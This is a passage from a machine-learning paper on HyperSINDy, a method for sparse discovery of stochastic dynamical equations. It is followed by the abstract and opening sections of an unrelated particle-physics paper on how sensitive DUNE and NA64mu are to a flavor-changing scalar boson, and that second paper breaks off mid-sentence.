problem, the \(L_{1}\) regularization (lasso) - which penalizes the actual values of the learned weights - is a more common technique to achieve sparsity in practice. Nonetheless, incorporation of an \(L_{0}\)-norm penalty (Zheng et al., 2019) into SINDy was recently found to have considerable advantages (Champion et al., 2020), motivating us to adopt a backpropagation-compatible \(L_{0}\) regularization. Accordingly, we implement one such method recently proposed by Louizos et al. (2018), which penalizes a trainable mask using the hard-concrete distribution. Specifically, let \(M\in\mathbb{R}^{d}\) be the desired sparse mask. Let \(s\) be a binary concrete random variable (Maddison et al., 2017; Jang et al., 2017) distributed in \((0,1)\) with probability density \(q_{\phi}(s)\), cumulative density \(Q_{\phi}(s)\), location \(\log\alpha\), and temperature \(\beta\). Let \(\phi=(\log\alpha,\beta)\). Suppose we have \(\gamma<0\) and \(\zeta>1\). We define each element \(m\) in \(M\) as a hard concrete random variable computed entirely as a transformation of \(s\). Thus, learning an optimal \(m\) necessitates learning \(q_{\phi}(s)\), which simplifies to optimizing \(\log\alpha\) (we fix \(\beta\)). Sampling from \(q_{\phi}(s)\) and backpropagating into \(\log\alpha\) motivates use of the reparameterization trick (as in the VAE above) with \(\epsilon\sim\mathcal{U}(0,1)\). Then, \(m\) is computed. \[s=\text{Sigmoid}((\log\epsilon-\log(1-\epsilon)+\log\alpha)/\beta)\qquad \qquad m=\min(1,\max(0,s(\zeta-\gamma)+\gamma)) \tag{3}\] After training, we obtain \(m\) using our optimized \(\log\alpha\) parameter: \[m=\min(1,\max(0,\text{Sigmoid}(\log\alpha)(\zeta-\gamma)+\gamma)) \tag{4}\] We train \(M\) using the following loss: \[L_{0}(M)=\sum_{j=1}^{d}\text{Sigmoid}(\log\alpha_{j}-\beta\log\frac{\gamma}{\zeta}) \tag{5}\] Refer to (Louizos et al., 2018) for the full derivation. In short, this provides a backpropagation-compatible approach to enforce sparsity via a trainable, element-wise mask. ## 3 HyperSINDy We combine advances in Bayesian deep learning with the SINDy framework to propose HyperSINDy, a hypernetwork (Ha et al., 2016; Pawlowski et al., 2018) approach to parsimoniously model stochastic nonlinear dynamics via a noise-parameterized vector field whose sparse, time-invariant functional form is discovered from data. In brief, HyperSINDy uses a variational encoder to learn a latent distribution over the states and derivatives of a system, whose posterior is regularized to match a Gaussian prior. Once trained, a white noise process generates a time-varying vector field by updating the coefficients of the discovered (random) ODE. Across a range of experiments, new noise realizations generate stochastic nonlinear dynamics that recapitulate the behavior of the original system, while also enabling UQ on the learned coefficients. Fig. 1 provides an overview of our approach and problem setting, which we detail below. Problem SettingStochastic equations are fundamental tools for mathematically modeling dynamics under uncertainty. In general, the precise physical source of uncertainty is unknown and/or of secondary importance (Friedrich et al., 2011; Duan, 2015; Sarkka and Solin, 2019); as such, several formulations exist. A common choice is the Langevin-type SDE with explicitly separated deterministic (drift) and stochastic (diffusion) terms. Alternatively, we may consider a deterministic ODE with stochastic parameters, i.e., a _random_ ODE (RDE), which is another well-established framework (Arnold, 1998; Duan, 2015) with wide-ranging real-world applications (e.g., fluctuating resources in biological systems (Kloeden and Potzsche, 2013; Caraballo and Han, 2016)). Here, we adopt the RDE formulation in the widely studied setting of i.i.d. noise (Arnold, 1998; Caraballo and Han, 2016). We find this formulation practically advantageous for integration with deep generative modeling and VI, enabling a powerful and scalable approach to stochastic dynamics. Importantly, as any (finite-dimensional) SDE can be transformed into an equivalent RDE and vice versa (Han and Kloeden, 2017); these practical advantages can be exploited without compromising relevance to canonical SDE representations (as we will empirically demonstrate). As above, let \(\mathbf{x}_{0:T}\) be the observations from times \(0\) to \(T\) of the state of a system, \(\mathbf{x}_{t}\in\mathbb{R}^{n}\). We assume these data are generated from some stochastic dynamics \(\dot{\mathbf{x}}=f_{\mathbf{z}}(\mathbf{x}_{t})\), where \(\mathbf{z}\) is a latent random variable to modeled as an i.i.d. noise process. We wish to identify a family of sparse vector field functions \(f_{\mathbf{z}}\) constrained to a common functional form for all \(\mathbf{z}\in\mathbb{R}^{d}\) (i.e., only the coefficients of \(f\) are time-varying, reflecting the system's dependence on fluctuating quantities). With this framing, we seek to approximate both the functional form \(f_{\mathbf{z}}\) and a posterior estimate of the latent noise trajectory \(\mathbf{z}=[\mathbf{z}_{0},\mathbf{z}_{1},...,\mathbf{z}_{T}]^{T}\) associated with each observed trajectory \(\mathbf{x}_{0:\mathbf{T}}\). To do so, we employ a variational encoder to learn an inference model for the latent space \(p(\dot{\mathbf{z}}|\mathbf{x},\dot{\mathbf{x}})\) and a generative model \(p(\dot{\mathbf{x}}|\mathbf{x},\mathbf{z})\) subject to \(\dot{\mathbf{x}}=f_{\mathbf{z}}(\mathbf{x})\), as detailed below. Ultimately, once trained, we may generate new trajectories of \(\mathbf{x}\) simply by iteratively sampling \(\mathbf{z}\) from its Gaussian prior (i.e., constructing new sample paths of the driving noise). Generative ModelConsider the following factorization of the conditional generative model with parameters \(\theta\): \[p_{\theta}(\dot{\mathbf{x}},\mathbf{z}|\mathbf{x})=p_{\theta}(\dot{\mathbf{x} }|\mathbf{z},\mathbf{x})p_{\theta}(\mathbf{z}) \tag{6}\] We assume that \(\mathbf{z}\) is independent of \(\mathbf{x}\), so \(p_{\theta}(\mathbf{z}|\mathbf{x})=p_{\theta}(\mathbf{z})\). \(p_{\theta}(\dot{\mathbf{x}}|\mathbf{z},\mathbf{x})\) describes how the state \(\mathbf{x}\) and latent \(\mathbf{z}\) are transformed into the derivative, while \(p_{\theta}(\mathbf{z})\) is a prior over the latent distribution of states and their derivatives. We choose \(p_{\theta}(\mathbf{z})\) to be a standard Gaussian with diagonal covariance: \(p_{\theta}(\mathbf{z})=\mathcal{N}(0,\mathbf{I})\). There are numerous ways to implement \(f_{\mathbf{z}}(\mathbf{x})\), which parameterizes \(p_{\theta}(\dot{\mathbf{x}}|\mathbf{z},\mathbf{x})\). Following the SINDy framework, which seeks interpretable models in the form of sparse governing equations, we adapt 1 to arrive at the following implementation for \(f_{\mathbf{z}}(\mathbf{x})\): \[f_{\mathbf{z}}(\mathbf{x})=\Theta(\mathbf{x})(\Xi_{\mathbf{z}}\odot M). \tag{7}\] where \(\odot\) indicates an element-wise multiplication. \(\Theta(\mathbf{x})\) is a matrix expansion of \(\mathbf{x}\) using a pre-defined library of basis functions, which can include any rational functions, such as polynomial (e.g., \(\mathbf{x}_{1}^{2},\mathbf{x}_{1}\mathbf{x}_{2}\)) or trigonometric (e.g., \(\sin\mathbf{x}_{1},\tanh\mathbf{x}_{3}\)) functions. \(\Xi_{\mathbf{z}}\) is a matrix of coefficients that is output by a hypernetwork \(H\) that takes in \(\mathbf{z}\) as input: \(\Xi_{\mathbf{z}}=H(\mathbf{z})\). \(M\) is a matrix of values \(M_{ij}\in[0,1]\) that is trained with a close approximation to a differentiable \(L_{0}\) norm. Specifically, the values of \(M\) are simulated using a hard concrete distribution. As such, \(M\) enforces sparsity in the terms of each equation through the element-wise multiplication \((\Xi_{\mathbf{z}}\odot M)\). Refer to to the Background section for more details on \(M\). We constrain \(f_{\mathbf{z}}\) to a \(d\)-parameter family of ODEs sharing a common functional form. Specifically, \(H\) implements an implicit distribution \(p_{\theta}(\mathbf{\Xi}|\mathbf{z})\) with \(\mathbf{z}\in\mathbb{R}^{d}\). Although we cannot compute the density of \(p_{\theta}(\mathbf{\Xi}|\mathbf{z})\) exactly, we can generate an ensemble of possible derivative functions by feeding samples \(\mathbf{z}\sim p_{\theta}(\mathbf{z})\) into the hypernetwork: \(\Xi_{\mathbf{z}}=\psi(\mathbf{z})\). Inference ModelOur inference model is defined by the approximate posterior, \(q_{\phi}(\mathbf{z}|\mathbf{x},\dot{\mathbf{x}})\), with parameters \(\phi\), \(q_{\phi}(\mathbf{z}|\mathbf{x},\dot{\mathbf{x}})\) is implemented by a neural network \(E\) and the reparameterization trick, i.e., \(\mu_{q},\sigma_{q}=E(\mathbf{x},\dot{\mathbf{x}})\); \(\dot{\mathbf{z}}=\mu_{q}+\epsilon\odot\sigma_{q}\). TrainingWe train the model end-to-end with backpropagation to minimize the following loss function: \[loss=(\dot{\mathbf{x}}-f_{\mathbf{z}}(\mathbf{x}))^{2}+\beta D_{KL}(q_{\phi}( \mathbf{z}|\mathbf{x},\dot{\mathbf{x}})||p_{\theta}(\mathbf{z}))+\lambda L_{ 0}(M) \tag{8}\] where \(\beta\) and \(\lambda\) are hyperparameters. The loss function optimizes the parameters \(\phi\) and \(\theta\), where \(\phi\) are the parameters of \(E\) (i.e., the variational parameters) and \(\theta\) are the parameters of \(H\) and \(M\) (note that \(p_{\theta}(\mathbf{z})\) has fixed parameters). Refer to the Appendix for a full derivation of this loss function, and to Background for details on the sparsity-related loss \(L_{0}(M)\) (especially equation 5). To speed up training, every set number of epochs, we permanently set values of \(M\) equal to 0 if the magnitude of corresponding coefficients fall below a specific threshold value. ## 4 Results We evaluate the performance of HyperSINDy on four stochastic dynamical systems. Across a range of (dynamical) noise levels, we seek to assess the accuracy of models identified by HyperSINDy and the degree to which uncertainty estimates faithfully reflect the level of simulated noise. Refer to the Appendix for full details on data generation, training, and simulations. ### Stochastic Equation Discovery First, we show results for 3D Stochastic Lorenz and 3D Stochastic Rossler datasets, simulated by: \[\dot{x} =\omega(y-x) \dot{y} =x(\rho-z)-y \dot{z} =xy-\beta z \text{Lorenz} \tag{9}\] \[\dot{x} =-y-z \dot{y} =x+ay \dot{z} =b+z(x-c) \text{Rossler} \tag{10}\] where \((\omega,\rho,\beta)\) and \((a,b,c)\) are iteratively sampled (at each timestep) from normal distributions with scale \(\sigma\) and mean \((10,28,\frac{8}{3})\) and \((0.2,0.2,5.7)\), respectively. We train a HyperSINDy model on three trajectories from each system, with \(\sigma=1,5,10\). Refer to figure 2 for the full results. HyperSINDy correctly identifies most terms in each equation. Notably, increasing noise has little impact on the mean coefficients learned by HyperSINDy; instead, the estimated standard deviations of these coefficients proportionately scale with the dynamical noise. Furthermore, HyperSINDy correctly identifies which dynamical terms contain more noise and only increases the standard deviation of those terms, while maintaining tight bounds on other terms (i.e. \(xy\) in \(\dot{y}\) for Lorenz). Moreover, HyperSINDy is able to simulate the original (stochastic) dynamical behavior even as the noise level increases (blue trajectories). On the other hand, because HyperSINDy also successfully identifies the deterministic functional form despite process noise, it is able to produce smooth trajectories (purple) by forecasting with the mean of the discovered equation ensemble. Moreover, we ran separate experiments generating 10 trajectories (each with a different random seed, and each generated from a different initial condition) for each noise level of both systems. In total, we trained one HyperSINDy model and one E-SINDy model on each trajectory, yielding 30 HyperSINDy models and 30 E-SINDy models. We evaluated the RMSE of the mean and standard deviation of the discovered equations, as compared to ground truth. Refer to Table 1 for the full results. HyperSINDy outperforms E-SINDy on both mean and standard deviation for each experiment. ### Recovering drift-diffusion dynamics The preceding analyses validate HyperSINDy's capacity for stochastic equation discovery. As HyperSINDy adopts an RDE modeling strategy (i.e., a noise-parameterized ODE (Arnold, 1998; Han and Kloeden, 2017), rather than an SDE with separable drift and diffusion), validation was demonstrated on RDE-simulated data to enable straightforward comparison with ground truth. Crucially, RDEs are conjugate to SDEs (Han and Kloeden, 2017), so this distinction is not fundamental. Nonetheless, this raises the question of how HyperSINDy learns to represent SDE-simulated dynamics. \begin{table} \begin{tabular}{l l l l l l} \hline \hline & & \multicolumn{2}{c}{Lorenz} & \multicolumn{2}{c}{Rossler} \\ \cline{3-6} Param & & HyperSINDy & E-SINDy & HyperSINDy & E-SINDy \\ \hline 1 & MEAN & **0.082**\(\pm\) 0.004 & 0.18 \(\pm\) 0.029 & **0.029**\(\pm\) 0.035 & 0.077 \(\pm\) 0.04 \\ & STD & **0.598**\(\pm\) 0.045 & 1.296 \(\pm\) 0.083 & **0.828**\(\pm\) 0.059 & 0.849 \(\pm\) 0.012 \\ 5 & MEAN & **0.117**\(\pm\) 0.022 & 0.268 \(\pm\) 0.064 & **0.086**\(\pm\) 0.047 & 0.296 \(\pm\) 0.199 \\ & STD & **0.4**\(\pm\) 0.055 & 0.971 \(\pm\) 0.024 & **0.807**\(\pm\) 0.012 & 0.875 \(\pm\) 0.023 \\ 10 & MEAN & **0.203**\(\pm\) 0.047 & 0.349 \(\pm\) 0.103 & **0.228**\(\pm\) 0.138 & 0.699 \(\pm\) 0.551 \\ & STD & **0.279**\(\pm\) 0.085 & 0.913 \(\pm\) 0.016 & **0.812**\(\pm\) 0.014 & 0.875 \(\pm\) 0.028 \\ \hline \hline \end{tabular} \end{table} Table 1: Total coefficient RMSE relative to ground truth equations Figure 2: **3D Stochastic Lorenz and Rossler**. HyperSINDy models trained on trajectories of varying noise (\(\sigma\)). The mean and standard deviation of the discovered governing equation coefficients are shown. Refer to 9 and 10 for the ground truth equations. Red trajectories indicate sample test trajectories simulated with the given \(\sigma\). Purple trajectories are generated from HyperSINDy using the mean of the discovered governing equations, while blue trajectories are generated by iteratively sampling from HyperSINDy’s learned generative model. The test and HyperSINDy trajectories are generated from the same initial condition. To address this question, we simulate a 2D SDE to enable direct comparison against the leading method, stochastic SINDy (Boninsegna et al., 2018), as implemented in Python (Nabeel et al., 2022) (which cannot easily scale to higher dimensions). Specifically, we simulate a widely used model for population dynamics, the stochastic Lotka-Volterra system with state-dependent diffusion: \[\dot{x}=x-xy+\sigma_{x}(x,y)\mathcal{N}(0,1) \dot{y}=-y+xy+\sigma_{y}(x,y)\mathcal{N}(0,1) \tag{11}\] where we have: \[\sigma_{x}(x,y)=0.25x-0.09y \sigma_{y}(x,y)=-0.09x+0.25y\] Figure 3 illustrates the results of this analysis. Notably, HyperSINDy learns an expression whose terms correspond to those of the original drift function, thus enabling physical insight into the system. Moreover, although the diffusion term is not directly comparable with HyperSINDy's representation of stochasticity (coefficient noise), we may numerically estimate drift and diffusion coefficients from HyperSINDy's simulated trajectories. Specifically, we may estimate the first two Kramers-Moyal (K-M) coefficients, which derive from a Taylor expansion of the master equation (and from which derives the Fokker-Planck equation), and which fully describe the Markovian dynamics. Notably, HyperSINDy captures the appropriate deterministic (drift) and stochastic (diffusion) behavior of the system, recapitulating the state-dependence of these terms as seen in the original system - even performing favorably to stochastic SINDy in this setting. ### High Dimensional Stochastic Discovery Lastly, we assess HyperSINDy's capacity for Bayesian inference/stochastic modeling for high dimensional stochastic systems, which are not amenable to existing analytical SDE discovery methods (e.g., (Boninsegna et al., 2018; Callaham et al., 2021)). Thus, we simulate a stochastic version of the Lorenz-96 system using: \[\dot{x}_{i}=F_{i}+x_{i+1}x_{i-1}-x_{i-2}x_{i-1}-x_{i} \tag{12}\] Figure 3: **Recovering drift and diffusion behavior in the stochastic Lotka-Volterra model.** K-M coefficients computed on sample trajectories from each of the three models (Euler-Maruyama integration, \(\Delta t=0.01\)). From left to right: the ground truth SDE, the HyperSINDy-discovered system, and the Stochastic SINDy-discovered system. for \(i=1,...,10\) where \(x_{-1}=x_{9}\), \(x_{0}=x_{10}\), and \(x_{11}=x_{1}\). We iteratively sample each \(F_{i}\) from a normal distribution: \(F_{i}\sim\mathcal{N}(8,10)\). Refer to Fig. 4 for the full results. HyperSINDy correctly identifies all terms in the system, while also correctly learning a high variance coefficient exclusively for the forcing terms, \(F_{i}\). In addition, HyperSINDy produces sample trajectories that match the stochastic dynamical behavior of ground truth sample trajectories. ## 5 Discussion We have provided an overview of HyperSINDy, a neural network-based approach to sparse equation discovery for stochastic dynamics. Importantly, HyperSINDy is unique in its ability to provide analytical representations and UQ in the setting of high-dimensional stochastic dynamics. The present work represents a proof of concept for this architecture. We envision numerous future directions for extending the algorithmic and theoretical aspects of HyperSINDy - e.g., evaluation in the context of other noise types and with respect to convergence in the continuous limit. Moreover, while we employ a fairly straightforward implementation of SINDy, numerous developments of the SINDy framework (Kaptanoglu et al., 2022) may be smoothly incorporated into the HyperSINDy architecture. Finally, the integration of SINDy into a neural network framework paves the way for future developments that incorporate advances in probabilistic machine learning with interpretable equation discovery. Figure 4: **10D Stochastic Lorenz-96**. A sample test trajectory with \(\sigma=10\) (top) and sample HyperSINDy trajectory (middle) after training on a dataset with \(\sigma=10\). The bottom boxes show the mean and standard deviation of coefficients in the discovered governing equations (cf. 9).
2306.07405
Sensitivity potential to a light flavor-changing scalar boson with DUNE and NA64$μ$
In this work, we report on the sensitivity potential of complementary muon-on-target experiments to new physics using a scalar boson benchmark model associated with charged lepton flavor violation. The NA64$\mu$ experiment at CERN uses a 160-GeV energy muon beam with an active target to search for excess events with missing energy and momentum as a probe of new physics. At the same time, the proton beam at Fermilab, which is used to produce the neutrino beam for the Deep Underground Neutrino Experiment (DUNE) will also produce a high-intensity muon beam dumped in an absorber. Combined with the liquid Argon Near Detector, the system could be used to search for similar scalar boson particles with a lower energy but higher intensity beam. We find that both NA64$\mu$ and DUNE could cover new, unexplored parts of the parameter space of the same benchmark model, providing a complementary way to search for new physics.
B. Radics, L. Molina-Bueno, L. Fields., H. Sieber, P. Crivelli
2023-06-12T20:16:29Z
http://arxiv.org/abs/2306.07405v1
# Sensitivity potential to a light flavor-changing scalar boson with DUNE and NA64\(\mu\) ###### Abstract In this work, we report on the sensitivity potential of complementary muon-on-target experiments to new physics using a scalar boson benchmark model associated with charged lepton flavor violation. The NA64\(\mu\) experiment at CERN uses a 160-GeV energy muon beam with an active target to search for excess events with missing energy and momentum as a probe of new physics. At the same time, the proton beam at Fermilab, which is used to produce the neutrino beam for the Deep Underground Neutrino Experiment (DUNE) will also produce a high-intensity muon beam dumped in an absorber. Combined with the liquid Argon Near Detector, the system could be used to search for similar scalar boson particles with a lower energy but higher intensity beam. We find that both NA64\(\mu\) and DUNE could cover new, unexplored parts of the parameter space of the same benchmark model, providing a complementary way to search for new physics. ## I Introduction Observations in cosmology and astrophysics imply the existence of a Dark Sector potentially containing new particles that could weakly couple to Standard Model (SM) particles [1]. Neutrino oscillations coupled with non-zero neutrino masses provide an experimental evidence of lepton-flavor violation. Furthermore, the existing discrepancy between the measured [2] and expected [3; 4] value of the muon anomalous magnetic moment provides a strong motivation for new physics searches with muons [5]. Inspired by these developments, a certain class of new theories proposes the search for charged lepton flavor violation (CLFV), which is heavily suppressed in the Standard Model (SM). In the coming decades, a new generation of experiments will conduct experimental searches for CLFV [6; 7; 8; 9; 10; 11]. In parallel, next-generation long-baseline neutrino oscillation experiments [12; 13] will study neutrino oscillations and at the same time produce an intense muon beam-dump with its beam line. In this work we study the sensitivity potential of muon-on-target experiments to new physics using a CLFV benchmark model. The physics scenario was introduced in a recent work [14] and uses a light, scalar boson associated with \(\mu-\tau\) conversion. While the previous work derived constraints from data in existing beam-dump experiments (LSND[15], NuTeV [16], CHARM [17]) and for the future SHiP experiment [18], here we focus on two further experiments: the coming neutrino experiment, DUNE [12] deploying a high-intensity beam from the Long-Baseline Neutrino Facility (LBNF) [19], and a fixed-target experiment, NA64\(\mu\)[20; 21], which searches for new physics with the high-energy muon beam from the CERN Super Proton Synchrotron (SPS) accelerator. Hence, we study new physics searches using two complementary muon-beam setups. Even though we focus on one particular benchmark model scenario, there are also other possibilities to probe hidden sectors with muon beams and using similar techniques [22; 23; 24; 25; 26]. ## II Flavour-changing scalar with long lifetime The model proposed by [14] considers a new complex scalar field, \(\phi\), with a mass window \([m_{\tau}-m_{\mu},m_{\tau}+m_{\mu}]\) that couples to \((\mu,\tau)\). With such a mass range, long lifetimes can be achieved with propagation distances on the order of tens of kilometers. The effective Lagrangian interaction terms describe the coupling of the new scalar field with leptons, \[\mathcal{L}_{\mathcal{I}}=\phi\bar{\mu}(g_{V}+g_{A}\gamma^{5})l+\phi^{*}l(g_{ V}^{*}-g_{A}^{*}\gamma^{5})\mu \tag{1}\] with vector and axial vector coupling \(g_{V}\), \(g_{A}\). This model produces a benchmark parameter region explaining the muon \(g-2\) anomaly with a typical value of \(|g_{V}|\simeq 3\times 10^{-3}\), also used in this work. There are multiple production modes to produce \(\phi\) at beam dump experiments: direct electroweak process, heavy meson decay and high-energy muons on hitting a fixed target. In this work, we focus on the third case (the so-called \(\mu\)-on-target scenario). In this mode, muons pass through dense material and could produce the \(\phi\) boson via the exchange of a virtual photon with the nuclei of the target, \(\mu(p)N(P_{i})\rightarrow\tau(p^{\prime})\phi(k)N(P_{f})\). Once created, the bosons produce a missing energy signature or propagate long distances and may be detected in a detector downstream from the target. When the incoming beam energy is much higher than the particle mass, the double-differential cross-section of the \(2\to 3\) production process can be estimated using the equivalent photon approximation [27], \[\frac{d^{2}\sigma(p+P_{i}\to p^{\prime}+k+P_{f})}{dE_{\phi}d \cos\theta_{\phi}}= \tag{2}\] \[\frac{\alpha\chi}{\pi}\frac{E_{\mu}x\beta_{\phi}}{1-x}\frac{d \sigma(p+q\to p^{\prime}+k)}{d(p\cdot k)}\bigg{|}_{t=t_{\rm min}}\] where \(E_{\mu}\) is the initial muon energy, \(E_{\phi}\) is the energy and \(\theta_{\phi}\) the scattering angle of \(\phi\) with respect to the initial muon in the lab frame, \(x=E_{\phi}/E_{\mu}\), \(q=P_{i}-P_{f}\), \(t=-q^{2}\) is the momentum transfer, \(\alpha=1/137\) is the fine structure constant, \(\beta_{\phi}\) is the relativistic factor for \(\phi\), and \(\chi\) is the effective photon flux, defined as \[\chi=\int_{t_{\rm min}}^{t_{\rm max}}dt\frac{t-t_{\rm min}}{t^{2}}F^{2}(t) \tag{3}\] where \(F(t)=Z^{2}/(1+t/d)^{2}\) is the form factor with \(d=0.164\) GeV\({}^{2}A^{-2/3}\), and the limits are given in the appendix of [14]. We calculate the analytical expression for \(\chi\) using Mathematica [28] and obtain \[\chi=Z^{2}\left[\frac{t_{\rm min}}{t}+\frac{d+t_{\rm min}}{d+t}+\frac{(d+2t_{ \rm min})}{d}\frac{\ln t}{\ln{(d+t)}}\right]_{t_{\rm min}}^{t_{\rm max}}. \tag{4}\] In Eq. 2, \(\sigma(p+q\to p^{\prime}+k)\) is the cross section for the \(2\to 2\) scattering process, \(\mu(p)\gamma(q)\rightarrow\tau(p^{\prime})\phi(k)\), \[\frac{d\sigma(p+q\to p^{\prime}+k)}{d(p\cdot k)}=\frac{|\bar{\mathcal{A}}_{2 \to 2}|^{2}}{8\pi s^{2}} \tag{5}\] where \(|\bar{\mathcal{A}}|^{2}\) is the amplitude squared, which we calculate using the FeynCalc tools [29] for Mathematica. We obtain the following expression for the \((\mu,\tau)\) case, \[|\bar{\mathcal{A}}_{2\to 2}|^{2}=-\frac{e^{2}m_{\mu}m_{ \tau}(g_{A}g_{A}^{*}-g_{V}g_{V}^{*})}{(m_{\mu}^{2}-s)^{2}(m_{\tau}^{2}-u)^{2}}\times \tag{6}\] \[\times\left[m_{\mu}^{4}(m_{\phi}^{2}+u)+2m_{\mu}^{3}(m_{\tau}^{2} -m_{\tau}u)\right.\] \[+m_{\mu}^{2}\left(m_{\tau}^{4}-2m_{\phi}^{2}s-2m_{\tau}^{2}u+u(u- 2s)\right)\] \[+2m_{\mu}m_{\tau}s(u-m_{\tau}^{2})+s\left(m_{\phi}^{2}s+m_{\tau} ^{4}-2m_{\tau}^{2}u+u(s+u)\right)]\] where \(e=\sqrt{4\pi\alpha}\), \(m_{\phi}\), \(m_{\tau}\), \(m_{\mu}\) are the masses of the boson \(\phi\), \(\tau\) and \(\mu\), respectively, and \(s\), \(u\) are the Mandelstam variables, which can be evaluated in the laboratory frame, \[s=(p+q)^{2}\simeq m_{\mu}^{2}-\frac{u-m_{\tau}^{2}}{1-x} \tag{7}\] \[u=(p-k)^{2}\simeq-E_{\mu}x\theta_{\phi}^{2}-\frac{1-x}{x}m_{\phi }^{2}+(1-x)m_{\mu}^{2}.\] To calculate the lifetime of the \(\phi\) boson, \(\tau_{\phi}\), we use Equations 3.2-3.5 in [14] adapted to the \((\mu,\tau)\) case. We calculate the cross-section and decay-width using the GNU Scientific Library [30]. The production cross-section for the \(\phi\) boson as a function of the incoming lepton energy is shown in Fig. 1. Assuming \(m_{\phi}\simeq m_{\tau}\), the threshold for the production is given by \(E_{\mu}>[(2m_{\tau}+m_{N})^{2}-m_{\mu}^{2}-m_{N}^{2}]/2m_{N}\simeq 3.8\) GeV for Pb, above which the cross-section steeply rises. In the following, we use the corresponding muon beam flux of each experiment (NA64\(\mu\) and DUNE) to evaluate the expressions for the \(\phi\) production via the variables defined in Eq. 7. ## III \(\mu\)-on-target experiments We estimate the projected sensitivity of an experiment by finding the pair of parameter values \((g_{V},m_{\phi})\), where \(N_{\phi}\) appropriate signal events are produced either directly in the target (NA64\(\mu\)) or in the detector (DUNE), as explained later, after a given exposure. In this work we exploit the \(\phi\) boson production process using different and complementary \(\mu\)-on-target experiments: NA64\(\mu\) with the active dump technique compared to proton beam-dump experiments such as the DUNE neutrino experiments using LBNF proton beam. Although the underlying production mechanism is the same, the two techniques differ in the flux of the muon beam, \(\Phi_{\mu}(E)\), the target thickness and materials. In a general case, \(\phi\) bosons are generated by the \(\mu\)-on Figure 1: Production cross-section of the \(\phi\) boson, with mass \(m_{\phi}=m_{\tau}\) and coupling constant \(|g_{V}|=3\times 10^{-3}\), as a function of the incoming muon energy. target process, and, after production, a fraction of them decay inside a detector volume and can be detected. The number of such signal events is \[N_{\phi}=\int dE_{\phi}\Phi_{\phi}(E_{\phi})\times\frac{l_{\rm det}}{\gamma\beta c \tau_{\phi}}, \tag{8}\] where \(\gamma\) is the relativistic Lorentz-factor, and \(\Phi_{\phi}(E_{\phi})\) is the flux of the \(\phi\) boson at the detector, estimated as \[\Phi_{\phi}(E_{\phi})=\int dE\Phi_{\mu}(E)\times \tag{9}\] \[\int_{E_{\rm min}}^{E}dE_{l}\frac{n_{A}}{-dE/dl}\int_{0}^{\theta_ {\rm det}}d\theta_{\phi}\sin\theta_{\phi}\frac{d^{2}\sigma(E_{l},E_{\phi})}{dE _{\phi}d\cos\theta_{\phi}}.\] Here, \(\Phi_{\mu}(E)\) is the flux of the muon beam as a function of energy, \(n_{A}\) is the number of target atoms per volume, \(E_{l}\) is the muon energy after traveling a length \(l\) in the target and losing energy according to the stopping power \(-dE/dl\), \(E_{\rm min}\) is the energy of the muon at the end of the target, and \(\theta_{\rm det}\) is the angular acceptance. In the next subsections we separately describe the two experimental scenarios and the assumptions in the derived sensitivity limits. ### NA64\(\mu\) scenario NA64\(\mu\) is a fixed-target experiment at CERN looking for new particles of Dark Matter and portal interactions produced in electromagnetic showers and coupled to muons. The experiment uses the secondary 160 GeV muons from the interactions of 400 GeV protons from the CERN SPS with a target. A set of beam scintillators and veto counters, low material-budget trackers and dipole magnets allow to precisely constrain the momentum of the incoming 160-GeV muons impinging on an active target. The main detector, where \(\phi\) may be produced, consists of an electromagnetic calorimeter with 40 \(X_{0}\) radiation length. Downstream, the detector is further equipped with veto counters and a \(\sim\)30-interaction length hadronic calorimeter. New particles could be produced by the muon beam scattering in the target and decay later to visible SM particles that could be seen by their signatures in a downstream detector. The current work is based on the detection of missing energy and momentum carried away by the produced hypothetical, long-lived \(\phi\) boson, leaving a scattered muon as experimental signature (the momentum of the scattered muon ranging between \(10-80\) GeV/c). The sensitivity in the search for the \(\phi\) boson is higher with respect to the beam-dump approach due to the lower power in the coupling strength without a decay vertex. Thus, in NA64\(\mu\) only the number of events at the production target needs to be estimated. Therefore, the number of events is given by \(N_{\phi}=\int dE_{\phi}\Phi_{\phi}(E_{\phi})\). Furthermore, the production target thickness is small and the muon energy loss can be neglected. As a result we use the following expression to estimate the \(\phi\) boson flux, \[\Phi_{\phi}(E_{\phi})=l_{\rm target}n_{A}\int dE\Phi_{\mu}(E)\times \tag{10}\] \[\int_{0}^{\theta_{\rm det}}d\theta_{\phi}\sin\theta_{\phi}\frac{ d^{2}\sigma(E,E_{\phi})}{dE_{\phi}d\cos\theta_{\phi}},\] where \(l_{\rm target}\) is the thickness of the target. There has been an extensive study of simulating and evaluating the production of Dark Matter particles with a muon beam at NA64 [26; 31; 32]. We use the same method in this work to estimate the sensitivity reach of the experiment. We assume a muon beam with a mean of 160 GeV energy and a width of 4.3 GeV hitting a lead target with a total data of \(\sim 3\times 10^{13}\) muons-on-target (MOT). ### DUNE/LBNF scenario The Deep Underground Neutrino Experiment is a next-generation, wide-energy beam long-baseline neutrino experiment at Fermilab. It will use an intense (anti)neutrino beam that passes through a Near Detector at Fermilab and a Far Detector 1300 km away in South Dakota. The neutrino beam line of DUNE is a result of an exhaustive design and optimization work [19]. The beam is produced by a 60-120 GeV proton beam hitting a graphite target after which the produced pions and kaons decay to leptons and neutrinos in a \(\sim 220\)-m-long decay pipe. At the end of pipe a dedicated \(\sim 30\)-m-long stainless-steel structure acts as a beam dump to stop all muons 300 m upstream from the Near Detector. We use the simulation of the neutrino beam production to trace particles along the beam axis. The muon flux used in the calculation is estimated from a dedicated tracking plane, which is located at the end of the decay pipe in the simulation. An example of the obtained muon energy spectrum is illustrated in Fig. 2. The peak of the spectrum is at \(E_{\mu}\simeq 2.5\) GeV, however, the long high-energy tail is responsible for the majority of \(\phi\) bosons production due to the rapid increase of the cross-section with the incoming lepton energy (see Fig. 1). At the lower energy region the production rate is much smaller. From the neutrino flux simulation we estimate an integrated muon flux of \(\Phi_{\mu}\simeq 5\times 10^{19}\) muons for \(1.1\times 10^{21}\) Proton-On-Target (POT), corresponding to one year of data taking. In DUNE, a signal could be detected in the Near Detector from the decay of the \(\phi\) boson that was produced by the muons hitting the stainless-steel dump. We consider the decay channel \(\phi\rightarrow\mu^{+}\mu^{-}\nu_{\mu}\nu_{\tau}\) with a branching ratio of 17% [14], motivated by the dimuon results from NuTeV [16]. Possible backgrounds leading to a dimuon signature include deep inelastic scattering (DIS) and resonance production of mesons in charged-current (CC) muon-neutrino (\(\nu_{\mu}\)) interactions with a target nucleus. The mesons could decay in semi-leptonic mode, producing an extra muon. In order to analyze such potential background processes we performed simulations with the GENIE [33] Monte Carlo (MC) event generator that provides a comprehensive neutrino interaction modeling in the \(E_{\nu}\sim 100\) MeV \(-\) few 100 GeV neutrino energy region, including quasi-elastic, 